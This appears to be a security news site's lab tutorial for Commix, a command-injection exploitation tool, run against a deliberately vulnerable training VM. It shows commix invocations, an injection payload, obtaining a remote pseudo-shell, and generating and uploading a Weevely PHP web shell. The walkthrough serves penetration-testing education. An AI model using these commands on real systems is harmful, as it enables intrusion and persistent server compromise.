Friday, May 9, 2025
HomeExploitation ToolsCommix – Automated All-in-One OS Command Injection and Exploitation Tool

Commix – Automated All-in-One OS Command Injection and Exploitation Tool

Published on

SIEM as a Service

Follow Us on Google News

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, by web developers, penetration testers, or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks.

By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. It is written in Python programming language.

Requirements and Installation

Requires version 2.6.x and above to run this tool, it can be downloaded from the GitHub.

- Advertisement - Google News
root@kali:~# git clone https://github.com/commixproject/commix.git

Also, can be installed through Ubuntu’s APT (Advanced Packaging Tool)

root@kali:~# apt-get install commix

Supported Platforms

  • Linux
  • Mac OS X
  • Windows (experimental)

Classic Injection

Step1: Download and mount the Pentester lab exercise Web for Pentester and then you can reach the labs from your Kali machine browser Ex: http://192.168.169.130

Step 2: You can find command line Injection exercises.

Commix – Automated All-in-One OS Command Injection and Exploitation Tool

Step 3: Now in Kali type commix and copy the path for example 1.

INJECT_HERE – It will try to inject various queries here.

root@kali:~# commix –url=”http://192.168.169.130/commandexec/example1.php?ip=INJECT_HERE”
Commix – Automated All-in-One OS Command Injection and Exploitation Tool
                                                               Injection attack

It checks for various payloads and successful with Payload: ;echo WIBYAT$((24+78))$(echo WIBYAT)WIBYAT.

Then it asks to connect with a terminal shell Do you want a Pseudo-Terminal shell? [Y/n/q] > By pressing “y” we can get the terminal access for the machine.

Blind Injection

commix –url=”http://192.168.169.130/commandexec/example1.php?ip=127.0.0.1″ –os=U –technique=”tf” -v 1
Commix – Automated All-in-One OS Command Injection and Exploitation Tool
                                                      Blind Injection

Injecting Weevely PHP web shell

Step 1: Create a payload with weevely, if weevely is not installed you can use apt-get install weevely.

Step 2: Launch weevely and generate a PHP web shell.

root@kali:~# weevely root@kali:~# weevely generate commix /root/Desktop/Commix/shellexploit.php
Commix – Automated All-in-One OS Command Injection and Exploitation Tool
PHP Shell with Weevely

Step 3: To upload the file in the remote host, use the following command.

–file-write  = File to write in the destination host

–file-dest  = Filepath to write or Upload

commix –url=”http://192.168.169.130/commandexec/example1.php?ip=INJECT_HERE” –file-write=’/root/Desktop/Commix/shellexploit.php’ –file-dest=”/var/www/upload/images/”

Also Read:

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

Hackers Target IT Admins by Poisoning SEO to Push Malware to Top Search Results

Cybercriminals are increasingly targeting IT administrators through sophisticated Search Engine Optimization (SEO) poisoning techniques. By...

New Mamona Ransomware Targets Windows Systems Using Abused Ping Command

Cybersecurity researchers are raising the alarm about a newly discovered commodity ransomware strain dubbed Mamona,...

Malicious Python Package Impersonates Discord Developers to Deploy Remote Commands

A seemingly innocuous Python package named ‘discordpydebug’ surfaced on the Python Package Index (PyPI)...

New Supply Chain Attack Compromises Popular npm Package with 45,000 Weekly Downloads

An advanced supply chain attack has targeted the well-known npm package rand-user-agent, which receives...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Cable: Powerful Post-Exploitation Toolkit for Active Directory Attacks

Cybersecurity researchers are raising alarms about Cable, a potent open-source post-exploitation toolkit designed to exploit...

Windows 11 BitLocker Bypassed to Extract Encryption Keys

An attacker with physical access can abruptly restart the device and dump RAM, as...

ConvoC2 – A Red Teamers Tool To Execute Commands on Hacked Hosts Via Microsoft Teams

A stealthy Command-and-Control (C2) infrastructure Red Team tool named ConvoC2 showcases how cyber attackers...